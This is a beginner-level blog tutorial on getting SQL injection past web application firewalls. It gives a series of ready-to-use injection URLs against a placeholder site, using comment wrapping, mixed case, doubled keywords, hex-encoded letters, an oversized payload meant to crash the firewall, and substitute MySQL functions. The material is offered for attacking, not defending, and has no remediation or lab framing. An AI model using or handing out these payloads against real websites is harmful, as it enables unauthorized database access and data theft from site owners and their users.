SqL Injection (WAF Bypass Methods)
Asalamu alikum frndzz I am Malik Ubi and Today I will show you how to bypass Web Application
Firewalls ( WAF ). I will explain WAF bypass from the Simplest and
most Basic Techniques to the Most Advanced ones I Learned So Lets play the game!
NOTE: If you don’t know SQL Injection, read SQL INjection
What is WAF?
WAF stands for Web Application Firewall. It is widely used
nowadays to detect and defend SQL Injections!
Let’s Begin!
How to know if there is a Web Application Firewall?
This is pretty simple! When you try to enter a command used
for SQL Injections (usually the “UNION SELECT” command),
you get an 403 Error (and the website says “Forbidden” or
“Not Acceptable”).
Example:
http://www.site.com/index.php?page_id=-15 UNION SELECT
1,2,3,4….
(We get a 403 Error!)
Basic/Simple Methods:
First, of course, we need to know the Basic Methods to bypass
WAF…
1) Comments:
You can use comments to bypass WAF:
http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!
SELECT*/ 1,2,3,4….
(First Method that can Bypass WAF)
However, most WAF identify this method so they still show a
“Forbidden” Error…
2) Change the Case of the Letters:
You can also change the Case of the Command:
http://www.site.com/index.php?page_id=-15 uNIoN sELecT
1,2,3,4….
(Another Basic Method to Bypass WAF!)
However, as before, this trick is also detected by most WAF!
3) Combine the previous Methods:
What you can also do is to combine the previous two
methods:
http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!
SelECt*/ 1,2,3,4….
This method is not detectable by many Web Application
Firewalls!
4) Replaced Keywords:
Some Firewalls remove the “UNION SELECT” Statement when
it is found in the URL… We can do this to exploit this function:
http://www.site.com/index.php?page_id=-15 UNIunionON
SELselectECT 1,2,3,4….
(The “union” and the “select” will be removed, so the final
result will be: “UNION SELECT” )
This method doesn’t work on ALL Firewalls, as only some of
them remove the “UNION” and the “SELECT” commands when
they are detected!
5) Inline Comments:
Some firewalls get bypassed by Inserting Inline Comments
between the “Union” and the “Select” Commands:
http://www.site.com/index.php?page_id=-15 %55nION/**/
%53ElecT 1,2,3,4…
(The %55 is equal to “U” and %53 to “S”. See more on the
Advanced Section….)
I believe that these are the most basic Methods to WAF
Bypassing! Let’s move on more advanced ones…
Advanced Methods:
Now that you have learned about Basic WAF Bypassing, I think
it is good to understand more advanced Methods!
1) Buffer Overflow / Firewall Crash:
Many Firewalls are developed in C/C++ and we can Crash
them using Buffer Overflow!
http://www.site.com/index.php?page_id=-15+and+(select 1)=
(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!
SeLECt*/+1,2,3,4….
(( You can test if the WAF can be crashed by typing:
?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/
%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4….
If you get a 500, you can exploit it using the Buffer Overflow
Method! ))
2) Replace Characters with their HEX Values:
We can replace some characters with their HEX (URL-
Encoded) Values.
Example:
http://www.site.com/index.php?page_id=-15 /*!u%6eion*/ /*!
se%6cect*/ 1,2,3,4….
(which means “union select”)
Text to Hex Encoder (Choose the “Hex Encoded for URL”
result!): 
3) Use other Variables or Commands instead of the common
ones for SQLi:
Apart from the “UNION SELECT” other commands might be
blocked.
Common Commands Blocked:
COMMAND | WHAT TO USE INSTEAD
@@version | version()
concat() | concat_ws() --> Difference between concat() and
concat_ws(): Click Here..
group_concat() | concat_ws()
Learning MySQL Really helps on such issues!
4) Misc Exploitable Functions:
Many firewalls try to offer more Protection by adding
Prototype or Strange Functions! (Which, of course, we can
exploit!):
Example:
This firewall below replaces “*” (asterisks) with Whitespaces!
What we can do is this:
http://www.site.com/index.php?page_id=-15+uni*on+sel*ect
+1,2,3,4… ;
(If the Firewall removes the “*”, the result will be: 15+union
+select….)
So, if you find such a silly function, you can exploit it, in this
way!
[+] In addition to the previous example, some other bypasses
might be:
-15+(uNioN)+(sElECt)….
-15+(uNioN+SeleCT)+…
-15+(UnI)(oN)+(SeL)(ecT)+….
-15+union (select 1,2,3,4…)
Thats all about WAF bypass hope you like it this one is for the Newbies
#Malik_Ubi
Post A Comment
No comments :